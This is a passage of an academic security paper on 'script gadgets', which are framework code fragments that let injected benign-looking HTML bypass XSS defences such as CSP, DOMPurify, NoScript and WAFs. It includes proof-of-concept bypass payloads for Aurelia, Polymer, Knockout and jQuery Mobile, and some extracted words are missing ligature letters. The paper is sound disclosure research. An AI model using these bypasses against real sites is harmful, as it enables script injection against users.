Code-Reuse Aacks for the Web: Breaking Cross-Site Scripting
Mitigations via Script Gadgets
Sebastian Lekies
Google
Krzysztof Kotowicz
Google
Samuel Groß
SAP
mail@samuel-gross.com
Eduardo A. Vela Nava
Google
Martin Johns
SAP
ABSTRACT
Cross-Site Scripting (XSS) is an unremitting problem for the Web.
Since its initial public documentation in 2000 until now, XSS has
been continuously on top of the vulnerability statistics. Even though
there has been a considerable amount of research [
15
,
18
,
21
] and
developer education to address XSS on the source code level, the
overall number of discovered XSS problems remains high. Because
of this, various approaches to mitigate XSS [
14
,
19
,
24
,
28
,
30
] have
been proposed as a second line of defense, with HTML sanitiz-
ers, Web Application Firewalls, browser-based XSS lters, and the
Content Security Policy being some prominent examples. Most of
these mechanisms focus on script tags and event handlers, either
by removing them from user-provided content or by preventing
their script code from executing.
In this paper, we demonstrate that this approach is no longer
sucient for modern applications: We describe a novel Web attack
that can circumvent all of theses currently existing XSS mitiga-
tion techniques. In this attack, the attacker abuses so called script
gadgets (legitimate JavaScript fragments within an application’s
legitimate code base) to execute JavaScript. In most cases, these
gadgets utilize DOM selectors to interact with elements in the Web
document. Through an initial injection point, the attacker can inject
benign-looking HTML elements which are ignored by these mitiga-
tion techniques but match the selector of the gadget. This way, the
attacker can hijack the input of a gadget and cause processing of his
input, which in turn leads to code execution of attacker-controlled
values. We demonstrate that these gadgets are omnipresent in al-
most all modern JavaScript frameworks and present an empirical
study showing the prevalence of script gadgets in productive code.
As a result, we assume most mitigation techniques in web applica-
tions written today can be bypassed.
CCS CONCEPTS
Security and privacy Browser se curity
;
Web application
security
; Intrusion detection systems; Firewalls; Penetration testing;
Web protocol security;
Permission to make digital or hard copies of part or all of this work for personal or
classroom use is granted without fee provided that copies are not made or distributed
for prot or commercial advantage and that copies bear this notice and the full citation
on the rst page. Copyrights for third-party components of this work must be honored.
For all other uses, contact the owner/author(s).
CCS’17, Oct. 30–Nov. 3, 2017, Dallas, Texas, USA
© 2017 Copyright held by the owner/author(s). ISBN 978-1-4503-4946-8/17/10.
DOI: http://dx.doi.org/10.1145/3133956.3134091
1 INTRODUCTION
Web technology is moving forward at a rapid pace. Everyday new
frameworks and APIs are pushed to production. This constant
development also leads to a change in attack surface and vulner-
abilities. In this process Cross-Site Scripting (XSS) vulnerabilities
have evolved signicantly in the recent years. The traditional re-
ected XSS issue is very dierent from modern DOM-based XSS
vulnerabilities such as mXSS [
12
], or expression-language-based
XSS [
10
]. While the topic of XSS becomes increasingly more com-
plex, many mitigation techniques only focus on the traditional and
well-understood reected XSS variant.
In this paper, we present a novel Web attack which demonstrates
that many mitigation techniques are inecient when confronted
with modern JavaScript libraries. At the core of the presented attack
are so-called script gadgets, small fragments of JavaScript contained
in the vulnerable site’s legitimate code. Generally speaking, a script
gadget is piece of JavaScript code which reacts to the presence
of specically formed DOM content in the Web document. In a
gadget-based attack, the adversary injects apparently harmless
HTML markup into the vulnerable Web page. Since the injected
content does not carry directly executable script code, it is ignored
by the current generation of XSS mitigations. However, during
the web application lifetime, the site’s script gadgets pick up the
injected content and involuntarily transform its payload into exe-
cutable code. Thus, script gadgets introduce the practice of code-reuse
attacks [27], comparable to return-to-libc, to the Web.
To explore the severity and prevalence of the underlying vul-
nerability pattern, we conduct a qualitative and quantitative study
of script gadgets. For this, we rst identify the various gadget
types, considering their functionality and their potential to un-
dermine existing XSS mitigations. Furthermore, we examine 16
popular JavaScript frameworks and libraries, focusing on contained
script gadgets and mapping the found gadget instances to the af-
fected XSS mitigations. For instance, in 13 out of the 16 examined
code-bases we found gadgets capable to circumvent the emerging
strict-dynamic
variant of the Content Security Policy [
34
]. Fi-
nally, we report on a large-scale empirical study on the prevalence
of script gadgets in popular web sites.
By crawling the Alexa top 5000 Web sites and their rst-level
links, we measured gadget-related data ows for approximately
650,000 individual crawled URLs. In total, we measured 4,352,491
sink executions with data retrieved from the DOM. Using our fully-
automated exploit generation framework, we generated exploits
and veried gadgets on 19.88% of all domains in the data set. As
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1709
we applied a very conservative, but false-positive-free verication
approach, we believe that this number is just a lower bound and
that the numbers of gadgets are considerably higher in practice.
In particular, this paper makes the following contributions:
To the best of our knowledge, we are the rst researchers to
systematically explore this new Web attack that allows to
circumvent popular XSS mitigation techniques by abusing
script gadgets. We describe the attack in detail and give a
categorization of dierent types of gadgets.
In order to explore script gadgets in detail, we present the
results of a manual study on 16 modern JavaScript libraries.
Based on proof-of-concept exploits we demonstrate that
almost all of these libraries contain gadgets. Furthermore,
we demonstrate how these dierent script gadgets can
be used to circumvent all 4 popular classes of mitigation
techniques: The Content Security Policy, HTML sanitizers,
Browser-based XSS lters and Web Application Firewalls.
Based on the results of the manual study, we built a tool
chain capable of automatically detecting and verifying gad-
gets at scale. Based on this tool, we conducted an empirical
study of the Alexa top 5000 Web sites including more than
650k Web pages. The results of this study suggests that
script gadgets are omnipresent in modern JavaScript-heavy
applications. While our study is very conservative when
measuring gadgets, we managed to detect and verify gad-
gets in 19.88% of all domains. This number just represents
a lower bound and is likely much higher in practice.
2 TECHNICAL BACKGROUND
2.1 JavaScript, HTML and the DOM
Since its development, JavaScript has been used to interact
with the DOM to make HTML documents more interactive.
To do this, JavaScript working in the browser uses many
dierent ways to read data from the DOM. Most of the cor-
responding functions such as
document.getElementById
or
document.getElementsByClassName
are based on DOM
selectors[
33
] by providing convenient wrappers around
document.querySelectorAll.
DOM selectors are a powerful pattern language that can be used
to query the DOM for certain elements, and therefore are the basis
for all modern JavaScript frameworks. For example, one of the most
famous JavaScript functions - jQuery’s
$
function - enhances the
browser-based selector language with a lot of syntactic sugar. In
the following table, we describe some selector features in detail:
Selector E.g. Matches...
Tag-based div div elements
Id-based #foo elements with id ’foo’
Class-based .foo elements with class ’foo’
Attr.-based [foo] elements with an attribute named ’foo’
2.2 Cross-site Scripting (XSS)
The term Cross-site Scripting (XSS) [
29
] describes a class of string-
based code injection vulnerabilities that let adversaries inject HTML
and/or JavaScript into Web content that is not legitimately under
their control. XSS vulnerabilities are generally categorized based on
the location of the vulnerable source code, i.e., server- or client-side
XSS, and the persistence of the injected attack code, i.e., reected
or stored XSS.
XSS can be avoided through secure coding practices, which
mainly rely on the careful handling of attacker controlled input
and context-aware sanitization/encoding of untrusted data before
processing it in a security sensitive context. For brevity, we’ll omit
further details on the basic vulnerability class and refer to the vast
body of existing work on the topic [7, 8, 17, 18, 21, 31].
2.3 XSS Mitigation Techniques
The basic XSS problem has been recognized since the beginning
of the decade [
5
], the root cause is understood, and a signicant
amount of work has been done to design approaches to detect and
prevent XSS issues in source code. XSS is statistically still the most
common vulnerability class however, and there seems to be no
overall decline in its prevalence. It therefore seems safe to assume
that XSS problems will not be solved completely with secure coding
practices alone.
For this reason various XSS mitigations have been introduced as
an important second line of defense. Instead of removing the under-
lying vulnerability, XSS mitigations aim to prevent the exploitation
of the vulnerability by stopping the execution of the injected script
code. XSS mitigations are widely implemented in four dierent
forms:
(1) HTML Sanitizers.
These are libraries used by developers
to clean untrusted HTML into HTML that is safe to use
within the application. This category contains examples
such as DOMPurify
1
and Google Closure
2
HTML sanitizer.
(2) Browser XSS Filters.
These lters are implemented as
part of the browser navigation and rendering, and they
attempt to detect an XSS attack and neuter it. Internet
Explorer, Edge, and Chrome implement XSS lters as part
of their default conguration. Firefox does not have one,
but the popular NoScript
3
AddOn implements one.
(3) Web Application Firewalls.
This is software that runs on
the server, and attempts to allow benign requests from web
trac, while detecting and blocking malicious requests. An
example of an open-source Web Application Firewall is
ModSecurity
4
with OWASP Common Rule Set
5
.
(4) Content Security Policy [34].
This is a browser feature
that a web developer can congure to dene a policy that
allows the browser to whitelist the JavaScript code that
belongs to the application.
These mitigations all fundamentally rely one of three basic strate-
gies:
(1) Request ltering
blocks HTTP requests before they
reach the application, working either at the browser level
1
https://github.com/cure53/DOMPurify
2
https://github.com/google/closure-library
3
https://noscript.net/
4
https://modsecurity.org/
5
https://github.com/SpiderLabs/owasp-modsecurity-crs
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1710
(like NoScript), or at the network or application level (like
WAFs).
(2) Response sanitization
focuses on detecting malicious
code and sanitizing it out of the response. Examples of
these are HTML sanitizers, as well as Internet Explorer’s
and Edge’s XSS lter.
(3) Code ltering
detects malicious JavaScript just before it
is executed and tries to detect whether it is benign or not.
Examples of this strategy include CSP and Chrome’s XSS
lter.
We will go into more details about the implementation of such
strategies and the ways to bypass them in Section 4.
3 SCRIPT GADGETS
In this section, we introduce the concept of script gadgets, explain-
ing how injecting a benign HTML markup may result in arbitrary
JavaScript execution by reusing parts of legitimate application code
and how this can be used to negate the eects of XSS mitigations.
3.1 Benign HTML markup
XSS mitigation techniques described in Section 2.3 aim to stop XSS
attacks by blocking execution of illegitimate, injected JavaScript
code. Mitigations detect the injected code, present in inline event
handlers or in separate
script
elements and prevent its execu-
tion, while legitimate JavaScript code, carrying appropriate trust
information, is left as-is and is allowed to execute.
Those XSS mitigations ignore injected HTML markup that would
not result in JavaScript execution - we’ll call such markup benign
HTML. Benign HTML does not contain
<script>
tags, inline event
handlers,
src
or
href
attributes with
javascript:
or
data:
URLs,
or other tags capable of JavaScript execution (
<link rel=import>
,
<meta>
,
<style>
). The following snippet is an example of benign
HTML:
<div class="greeting">
<b>Hello</b> world!
</div>
Listing 1: Benign HTML markup ignored by the mitigation
3.2 DOM selectors
The presence of benign HTML in a document does not directly
trigger code execution. However, in virtually all web applications
JavaScript code already present in the page interacts with the DOM,
reading data from the document by using various DOM selectors
(2.1). For example, a web application might take all elements with a
tootltip
attribute to decorate them by showing a given text when
the user selects these elements. JavaScript code reading data from
the DOM based on a selector is a common pattern in both user-land
and library code - example code snippets might look like this:
// Userland code
var button = document.getElementById("button");
button.getAttribute("data-text");
var links = $("a[href]").children();
// Reading 'ref' attributes in Aurelia framework
if (attrName === 'ref') {
info.attrName = attrName;
info.attrValue = attrValue;
info.expression = new NameExpression(
this.parser.parse(attrValue), 'element',
resources.lookupFunctions);=
}
// Vue.js reading from v-html attribute
if ((binding = el.attrsMap['v-html'])) {
return [{ type: EXPRESSION, value: binding }]
}
Listing 2: Reading data from the DOM
By injecting benign HTML markup matching DOM selectors
used in the application we are able to trigger the execution of
specic pieces of legitimate application code
6
- script gadgets.
3.3 Script Gadgets - Introduction
Script gadgets are fragments of legitimate JavaScript code belonging
to the web application that execute as a result of benign HTML
markup present in the web page. Script gadgets are not injected
by the attacker - they are already present either in the user-land
web application code, or one of the libraries/frameworks used by
the web application.
Our research explores using script gadgets to bypass XSS miti-
gations. In order to do that, gadgets must both result in arbitrary
script execution, and be triggered from benign HTML injection.
For example, a web application might assign a value read from the
DOM to the innerHTML property of an element:
var button = getElementById("my-button");
button.innerHTML = button.getAttribute("data-text");
Listing 3: Simple innerHTML gadget
Simple gadgets like these are often explored in the context of
DOM XSS vulnerabilities [
16
], but for the purpose of this research
we propose a new classication of gadgets of varying complexity.
But rst we’ll explain how to use script gadgets in attacks against
XSS mitigations.
6
An alternative way of triggering specic code paths in a web application from benign
markup is DOM clobbering. DOM clobbering allows markup to override variables
in JavaScript execution environment, making it possible to trigger specic script
behavior. While we have identied working bypasses of some XSS mitigations via
DOM clobbering, for clarity we focus only on DOM selector-based code triggers.
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1711
3.4 Attack Outline
In this paper, we introduce a novel XSS attack that relies on script
gadgets to cause the execution of the adversary’s JavaScript code.
Attacker model: The applicable attacker is the classic XSS at-
tacker [
29
], who is able to inject arbitrary HTML code into the
content of the attacked web document. In the context of this paper
whether the injection technique used is reected or stored XSS is
irrelevant.
As discussed above, existing XSS mitigations rely on the basic
assumption that malicious code is being directly injected into the
aected page in the course of an XSS attack. All non-script carrying,
injected HTML content is therefore assumed to be benign and
remains untouched by the mitigation. This assumption is exploited
by the proposed attack method. The HTML code injected by the
attacker exposes two characteristics:
(1)
The actual attack payload, for example the attack’s
JavaScript, is contained in the benign HTML in a non-
executable form.
(2)
The HTML is specically crafted so that its presence in
the web document triggers a script gadget already con-
tained in the web page’s legitimate JavaScript code. In other
words, the injected HTML payload triggers a code-reuse
attack, similar to ret2libc techniques used in exploitation
of memory-corruption vulnerabilities.
In the course of an attack, a script gadget accesses the injected
DOM content and uses the contained information in an insecure
manner, ultimately leading to the execution of the adversary’s code,
which was hidden in the benign HTML code. In summary, the class
of attacks described in this paper follows this basic pattern:
(1) Injection into the raw HTML.
The attacker controls the
DOM of the webpage and injects a payload that triggers
script gadgets in the application code. This payload con-
tains only benign HTML markup and matches the DOM
selectors used by the web application.
(2) Mitigation attempt.
An XSS mitigation inspects the in-
jected content, trying to detect script insertion. The benign
HTML markup is left as-is.
(3) Gadgets transforms the markup.
Gadgets present in
the legitimate JavaScript code take the injected payload
from the DOM using the DOM selectors and transform it
into JavaScript statements.
(4) Script executes
. The transformed JavaScript statements
are executed, resulting in XSS.
The precise ways to abuse gadgets to bypass XSS mitigations de-
pend on the type of mitigation and implemented mitigation strategy,
as we described in Section 2.3
3.5 Gadget Types
We identied several types of script gadgets useful in bypassing XSS
mitigations. Some of them may result in indirect script execution
on their own; others need to be combined in chains to be useful in
an attack.
3.5.1 String manipulation gadgets. These gadgets transform
their string input by using regular expressions, character replace-
ment and other types of string manipulation. When present, they
can be used to bypass mitigations based on pattern matching. For
example, the following gadget can be used to bypass some mitiga-
tions by using the
inner-h-t-m-l
attribute name that will later on
be used by Polymer framework to assign to element’s
innerHTML
property.
dash.replace(/-[a-z]/g, (m) => m[1].toUpperCase())}
Listing 4: Camel-casing the input in Polymer
Similar features are present in AngularJS frameworks, which
allows the attackers to use benign
data
attributes in place of
ng-
attributes that would be blocked by HTML sanitizers:
var PREFIX_REGEXP = /^((?:x|data)[:\-_])/i;
var SPECIAL_CHARS_REGEXP = /[:\-_]+(.)/g;
function directiveNormalize(name) {
return name.replace(PREFIX_REGEXP, '')
.replace(SPECIAL_CHARS_REGEXP, fnCamelCaseReplace);
}
Listing 5: Directive name normalization in AngularJS
3.5.2 Element construction gadgets. These gadgets create new
DOM elements. For XSS mitigation bypass purposes, we’re mostly
focused on identifying gadgets that may programmatically create
new script elements.
document.createElement(input)
document.createElement("script")
jQuery("<" + tag + ">")
jQuery.html(input) // if input contains <script>
Listing 6: Example element creation gadgets
One notable element construction gadget is present in jQuery’s
$.globalEval
function. This function creates a new
script
ele-
ment, sets its
text
property and appends the element to the DOM,
executing the code.
$.globalEval
combines an element creation
gadget with a JavaScript execution gadget (3.5.4). As
$.globalEval
is called in various common jQuery methods (e.g.
$.html
), a con-
trolled input to those may create new
script
elements, which is a
useful property for bypassing strict-dynamic CSP (see 4.4)
3.5.3 Function creation gadgets. These gadgets create new
Function
objects. The function body is usually composed of a mix
of the input and constant strings. Note that the created function
object needs to be executed by a dierent gadget.
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1712
// Knockout Function creation gadget.
var body = "with($context){with($data||{}){return{" +
rewrittenBindings + "}}}";
return new Function("$context", "$element", body);
// Underscore.js Function creation gadget.
source = "var __t,__p='',__j=Array.prototype.join," +
"print=function(){__p+=__j.call(arguments,'');};\n" +
source + 'return __p;\n';
var render = new Function(
settings.variable || 'obj', '_', source);
Listing 7: Example function creation gadgets
3.5.4 JavaScript execution sink gadgets. These gadgets are usu-
ally standalone, or are the last in the constructed gadget chain,
taking the input from the previous gadgets and putting it into a
DOM XSS[16] JavaScript execution sink.
eval(input);
inputFunction.apply();
node.innerHTML = "prefix" + input + "suffix";
jQuery.html(input);
scriptElement.src = input;
node.appendChild(input);
Listing 8: Example execution sink gadgets
3.5.5 Gadgets in expression parsers. Some modern JavaScript
frameworks (for example, Aurelia
7
, AngularJS
8
, Polymer
9
, Rac-
tive.js
10
, Vue.js
11
) interpret parts of the DOM tree as templates for
the application UI components. Those templates contain expres-
sions written in framework-specic expression languages to bind a
result of expression evaluation to a given position in the rendered
UI. For example, the following expression displays a capitalized
customer name:
<td>${customer.name.capitalize()}</td>
Listing 9: Sample expression in Aurelia
The framework extracts the template denition from the DOM,
identies embedded expressions by searching for appropriate code
delimiters (here:
${
and
}
), parses the expressions into an AST, and
evaluates them when the UI is rendered.
If the expression language syntax is expressive enough, attackers
can create expressions resulting in arbitrary JavaScript code exe-
cution - for example by traversing a
prototype
chain or accessing
object constructors [
9
] [
10
]. We found that various script gadgets
7
http://aurelia.io/
8
https://angularjs.org/
9
https://www.polymer-project.org/
10
http://www.ractivejs.org/
11
https://vuejs.org/
can be typically identied in the framework expression parsing and
evaluation engine which can lead to arbitrary code execution. For
example, the following gadgets can be found in Aurelia’s expression
parser:
if (this.optional('.')) { // Property access
result = new AccessMember(result, name);}
}
AccessMember.prototype.evaluate = function(...) {
return instance[this.name];
};
if (this.optional('(')) { // Function call
result = new CallMember(result, name, args);
}
CallMember.prototype.evaluate = function(...) {
return func.apply(instance, args);
};
Listing 10: Script gadgets in Aurelia expression parser (sim-
plied code)
It’s possible to link the above script gadgets into chains that
execute arbitrary functions such as
window.alert
- all by using
only benign HTML markup injection. (Aurelia looks for
ref
and
*.bind attributes in the document - that triggers our gadgets).
<div ref=me
s.bind="$this.me.ownerDocument.defaultView.alert(1)"
></div>
Listing 11: HTML Markup triggering gadget chain in Aurelia
In a similar fashion, the following benign HTML markup may
trigger a gadget chain calling alert in Polymer 1.x:
<template is=dom-bind><div
c={{alert('1',ownerDocument.defaultView)}}
b={{set('_rootDataHost',ownerDocument.defaultView)}}>
</div></template>
Listing 12: HTML Markup triggering gadget chain in Poly-
mer 1.x
3.6 Expressiveness of Gadget-based Exploits
In this section we discuss the expressiveness of gadget-based miti-
gation bypasses. Via gadgets, an attacker is able to execute arbitrary,
Turing-complete code. In general, we identied three ways of doing
so:
Eval-like functions:
If a gadget is able to trigger a call
to
eval
or another eval-like function, executing arbi-
trary code is straightforward. In our examples, we usually
demonstrate how the gadget is able to call a single function
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1713
inside the
window
object with a single attacker-controlled
parameter (e.g.
alert(1)
). As the
eval
function is also
located inside the
window
object and accepts one or more
parameters, all of these examples are capable of executing
arbitrary, Turing-complete JavaScript code.
Appending a script element:
Another class of gadgets
aims at appending a script element with either an attacker-
controlled
src
attribute or an attacker-controlled script
body. Similar to eval-based gadgets, this allows an attacker
to execute arbitrary code.
Abusing the expressiveness of an expression lan-
guage:
Most gadget-based mitigation bypasses leverage
eval-like functions or new script elements. However, in
Web applications employing some variants of CSP (see Sec-
tion 4.1.1), it is not possible to use these bypass methods. In
these cases, we can leverage expression languages to gain
arbitrary code execution. All expression languages that we
investigated are Turing-complete. If an exploit is able to
execute the expression interpreter, the exploit is as expres-
sive as the expression language itself. However, even if the
expression language itself is not Turing-complete, we can
still gain Turing-complete code execution in some cases.
Listing 17, for example, shows a very simple expression-
based attack to steal and reuse a CSP nonce in order to
add a seemingly trusted script, that allows us to achieve
arbitrary JavaScript code execution.
3.7 Finding Script Gadgets
Script gadgets (3.3) on their own are legitimate, trusted JavaScript
statements or code blocks. While some of them (3.5.4) are also
DOM XSS [
16
] sinks, others are as benign as property assignment,
or property traversal statements. This fact makes it particularly
dicult to identify such gadgets in the web application codebase.
We found the following two techniques are useful to identify
script gadgets:
3.7.1 Manual code inspection. First of all, gadgets can be found
manually or with the assistance of static-analysis tools. Finding
some of the simpler gadget types (for example, JS execution sinks or
Function creation gadgets) is straightforward. We found that more
complex gadgets, especially the ones present in expression parsers,
require signicant eort to locate and evaluate for usefulness. A
gadget may only be used if it’s reachable from a benign HTML
markup injection. For example, any property access, property setter,
or function call may potentially be useful in a chain, but only if the
property name or function object may be directly controlled from
the markup.
We found that manual code inspection makes it possible to nd
gadgets that would not otherwise be triggered in the usual applica-
tion code ow. For example, in Polymer 1.x (see Listing 12) we were
able to determine that overriding a
_rootDataHost
property lets us
execute JavaScript statements in a dierent scope, which lets us trig-
ger subsequent gadgets in the chain. This "private"
_rootDataHost
property was never meant to be accessible from Polymer expres-
sions.
In this research, we used manual code inspection to identify
gadgets in modern JavaScript frameworks (4.1).
3.7.2 Taint tracking. A subset of gadgets may be identied by
rendering the web application in a browser enriched with a taint-
tracking engine [
17
]. By marking the entirety of DOM tree as tainted
(i.e. simulating that the attacker has a reected HTML injection
capability), and checking whether tainted values reach specic
JavaScript execution sinks, we were able to identify ows linking
certain DOM selectors with JavaScript execution. While this ap-
proach is eective at scale, it has the limitation of only discovering
gadgets that are already used in a given web application (albeit not
neccesarily for script execution).
In this research, we used the taint tracking approach to evaluate
script gadget prevalence in user-land code (5.4).
4 CONCRETE XSS MITIGATION BYPASSES
USING SCRIPT GADGETS
In this section, we provide detailed information on how script gad-
gets can be leveraged to circumvent concrete state-of-the-art XSS
mitigations. We’ll follow the countermeasure classications, based
on their underlying mechanisms, that we introduced in Section 2.3.
4.1 Gadgets in Popular JavaScript Libraries
In order to measure the eectiveness of gadgets in bypassing XSS
mitigations, we needed to collect:
(1)
A list of XSS mitigation implementations with dierent
strategies
(2)
A list of as many gadgets as possible in popular frameworks
and libraries
4.1.1 Collecting a list of popular XSS mitigations. We selected
XSS mitigations that were either open-source, or widely distributed.
We also wanted a cross-section dierent mitigation implementation
strategies. The mitigations we decided to test were:
Content Security Policy
using dierent types of code
ltering:
Whitelist-based
where code is trusted based on
where it originates.
Nonce-based
where code is trusted only if it’s accom-
panied by a secret cryptographic nonce.
Unsafe-eval
source expression is usually used to-
gether with other policies, but looking at it separately
allows us to investigate eval-based gadgets.
Strict-dynamic
source expression is usually used to-
gether with a nonce-based CSP to automatically prop-
agate the trust of a nonced script to all script elements
generated by it.
Client-side HTML sanitizers
using dierent approaches
of sanitization:
DOMPurify
is a JavaScript-based HTML sanitizer
that supports HTML, SVG, MathML, among others.
Google’s Closure
library contains another
JavaScript-based HTML sanitizer that only supports
HTML.
Web Application Firewalls
are request ltering mitiga-
tions deployed as hardware in front of web servers, as well
as as software next to the web server itself.
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1714
CSP XSS Filters HTML Sanitizers WAFs
Whitelists Nonces Unsafe-eval Strict-dynamic Chrome Edge NoScript DomPurify Closure ModSecurity
3 4 10 13 13 9 9 9 6 9
Table 1: Mitigation-bypasses via gadgets in 16 Popular Libraries
ModSecurity
is an open-source Web Application
Firewall, commonly used with the OWASP Core Rule
Set.
XSS lters
employ either request lter, response sanitiza-
tion or code ltering approaches.
Chrome / Safari
employs a code ltering approach,
blacklisting scripts that appear in the request.
Internet Explorer / Edge
employs a response san-
itization approach, rewriting potentially dangerous
responses with something safe.
NoScript
employs a request ltering approach, block-
ing requests that look suspicious or potentially mali-
cious.
4.1.2 Collecting a list of popular JavaScript libraries. In order to
nd as many dierent gadgets as possible to test against mitigations,
we decided to search for gadgets in dierent popular JavaScript
frameworks and libraries. We obtained the lists of popular frame-
works and libraries from various online resources
12 13 14 15 16
. From
those lists, we focused on searching for gadgets in the following
frameworks (selected based on popularity and code familiarity by
the authors):
Trending JavaScript frameworks
(Vue.js, Aurelia, Poly-
mer)
Widely popular frameworks
(AngularJS, React, Em-
berJS)
Older still popular frameworks
(Backbone, Knockout,
Ractive, Dojo)
Libraries and compilers
(Bootstrap, Closure, RequireJS)
jQuery-based libraries
(jQuery, jQuery UI, jQuery Mo-
bile)
The process we used for manually identifying gadgets is de-
scribed in Section 3.7.1, but generally it was done by identifying
HTML
and
eval
-based sinks, as well as any documented feature that
seemed like an expression language. In cases when no sinks of that
form were reachable, we then looked for any mechanism exposed
by the framework or library that touched the DOM in any way, and
manually audited the code.
In Table 1 we summarize how many frameworks had gadgets that
could bypass each of the mitigations. Complete bypass collection
found during this analysis is available in the GitHub repository
17
.
12
Mustache Security
is a list of frameworks with gadgets.
https://github.com/cure53/mustache-security/tree/master/wiki
13
GitHub
contains a list of trending front-end JavaScript frameworks.
https://github.com/showcases/front-end-javascript-frameworks
14
TodoMVC
is a list of a sample application written in many dierent JavaScript
frameworks. http://todomvc.com/
15
JS.org Rising Stars 2016
is based on the activity on dierent GitHub projects
related to JavaScript frameworks in 2016. https://risingstars2016.js.org/
16
State of JS 2016
is based on a survey to web developers.
http://stateofjs.com/2016/frontend/
17
https://github.com/google/security-research-pocs
Table 2 within the Appendix also summarizes our research ndings.
For clarity, in the following sections we present and discuss only a
chosen selection of those bypasses.
4.2 Bypassing Request Filtering Mitigations
Request ltering mitigations attempt to identify malicious or un-
trusted HTML patterns, and stop them before they reach the appli-
cation. To accomplish this, these mitigations generally employ the
following approaches:
Enumerate known strings used in attacks.
For ex-
ample, HTML tags like
<script>
or attributes such as
onerror
allow the user to execute JavaScript with a single
HTML injection. The ModSecurity Core Rule Set version
3.0 is, at the time of writing, one of the most comprehensive
lists of attack vectors.
Detect characters used to escape from the contexts
where XSS vulnerabilities usually occur.
For example,
if an XSS vulnerability existed by directly injecting HTML
where the application expected to just output text, a request
ltering mitigation will attempt to detect the injection of
<
or
>
. If the vulnerability is present when injecting inside
an HTML attribute, escaping from the attribute would be
detected as the vulnerability.
Detect patterns and sequences frequently used in ex-
ploits.
For example, when an XSS attack is succesful, the
user will often attempt to steal credentials, or issue HTTP
requests. Therefore, some mitigations attempt to detect ac-
cess to
document.cookie
, or access to
XMLHTTPRequest
.
They also attempt to detect usual mechanisms to obfuscate
code execution, like references to
eval
or
innerHTML
, even
after doing several layers of agressive decoding.
Examples of XSS mitigations that adopt these approaches are:
NoScript XSS Filter
Web Application Firewalls
Request ltering mitigations detect only specic, XSS-related
HTML tags and attributes. Gadgets use HTML tags and attributes
that are considered benign, and that makes them capable of bypass-
ing such mitigations. For example, if a library takes the value of the
data-html
attribute and executes it as HTML, mitigations in this
group would not be able to detect that as malicious. An example of
HTML markup triggering such gadget chain was shown in Listing
11.
In addition, detection of context-breaking characters suddenly
becomes ineective because some gadgets change the meaning
of otherwise-safe text sequences, and make them dangerous. For
example, in AngularJS the use of two curly braces
{{
is a way to
dene the beginning of an AngularJS expression. Aurelia, in turn,
uses a dierent delimiter:
${
. An example of such seemingly-benign
markup was shown in Listing 9.
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1715
<iframe src="//knockout.example.com/?xss=
<div data-bind=value:a=location></div>
<div data-bind=value:a.href=name></div>"
name="javascript:alert(1)"></iframe>
Listing 13: Example of bypassing NoScript with Knockout
gadget
A good example of how to bypass request ltering mitigations
like NoScript with gadgets is presented in Listing 13. In this exam-
ple the expressiveness of the framework is used to split an exploit
such as
location.href=name
(which is detected as an attack by
NoScript as the global name property can generally be set by an
attacker to arbitrary content), into two components.
a=location
followed by
a.href=name
. Individually, these expressions are harm-
less, but together they allow the user to redirect the user to a
JavaScript URL specied in the name attribute. NoScript is not able
to parse the markup to gure out that they are both meant to be
executed together.
4.3 Bypassing Response Sanitization
Mitigations
Response sanitization mitigations are designed to reduce the num-
ber of false positive results that are potentially generated by re-
quest ltering. Instead of blocking potentially malicious requests,
response sanitization mitigations aim to detect whether a suspicious
payload actually gets injected into the response.
Response sanitization mitigations usually follow one of two
dierent techniques:
Remove or neuter the malicious attack.
One possible
way to tackle the potential injection of code is to neuter
it, or remove it from the HTTP response. In this approach,
the rest of the response is left as-is, but the suspicious code
is removed or made inert.
Block the response completely.
Another possible way
to react to an injection attempt is to completely block the
response, and display an error to the user. This approach
avoids cases in which an attacker tricks a mitigation tech-
nique into blocking a legitimate script (e.g. a frame buster).
Examples of implementations of XSS mitigations that adopt these
types of approaches are:
HTML sanitizers.
Most HTML sanitizers work by taking
a piece of HTML code and cleaning it of any malicious
input, and returning otherwise safe HTML. Most HTML
sanitizers, however, are based on whitelists that try to enu-
merate safe HTML tags and attributes across all browsers.
Internet Explorer / Edge XSS lter.
The XSS lter in
Microsoft Internet Explorer and Edge also sanitizes HTML
by replacing parts of HTML attributes and tag names with
a pound
#
symbol. Note that while HTML sanitizers use
whitelists, XSS lters on the other hand work on a black-
listing approach, enumerating dangerous HTML tags and
attributes known by the browser.
Bypassing HTML sanitizers usually requires a slightly dierent
approach than bypassing XSS lters. For HTML sanitizers, the
gadgets must reuse an otherwise safe and whitelisted attribute,
such as
class
or
id
. Gadgets that bypass XSS lters can also use
custom HTML tags and attributes such as
ng-click
in Angular or
v-html in Vue.
Given that mitigations based on response sanitization only block
vulnerabilities, but make no attempts at detecting artifacts of ex-
ploits, this makes them easier to bypass, since gadgets are by de-
nition "safe" code that becomes unsafe when it interacts with other
JavaScript code that is otherwise safe. Aiming to lower the false
positive rate by using response sanitization has the downside of not
being able to detect attacks that exploit features that are normally
safe when the JavaScript library is not used.
<div data-role=popup id='-->
&lt;script&gt;alert(1)&lt;/script&gt;'>
</div>
Listing 14: Example of bypassing DOMPurify with jQuery
Mobile gadget
An example on how to use gadgets to bypass response sani-
tization mitigations is presented in listing 14. As far as DOMPu-
rify is aware, the HTML it sanitized is completely safe. However,
jQuery Mobile, upon encountering an element with the attribute
data-role=popup
, will automatically try to inject an HTML com-
ment with its
id
. In the code above, we can escape from that com-
ment and execute our code. Note that the same attack works against
Internet Explorer’s XSS lter.
4.4 Bypassing Code Filtering Mitigations
Code ltering mitigations are an evolution on top of response sani-
tization. They attempt to leave the potentially malicious markup
untouched, and instead focus on preventing the execution of mali-
cious code. This approach has even lower false positive rate than
sanitization, since the code is ltered out only if it’s actually about
to be executed.
However, one side-eect of such an approach is that since gad-
gets do not directly execute any malicious code, but do so indirectly
through trusted code, it is a lot harder for XSS mitigations based
on code ltering to detect injections using gadgets.
The approaches taken by XSS mitigations based on code ltering
are:
Detect malicious code.
To detect whether a specic piece
